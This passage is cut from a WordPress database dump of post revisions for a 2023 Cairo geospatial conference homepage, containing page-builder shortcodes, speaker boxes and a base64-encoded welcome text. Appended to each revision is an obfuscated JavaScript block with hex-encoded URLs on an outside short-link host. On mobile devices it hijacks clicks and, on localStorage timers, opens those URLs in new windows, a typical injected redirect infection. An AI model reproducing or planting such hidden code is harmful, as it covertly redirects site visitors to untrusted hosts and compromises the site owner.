)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 21:14:53','2022-10-06 21:14:53','',2167,'https://gsw2023.com/?p=2339',0,'revision','',0),
(2340,1,'2022-10-06 21:18:15','2022-10-06 21:18:15','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ecf404\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_single_image image=\"2325\" alignment=\"center\" css_animation=\"fadeIn\" title=\"AASTMT\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 21:18:15','2022-10-06 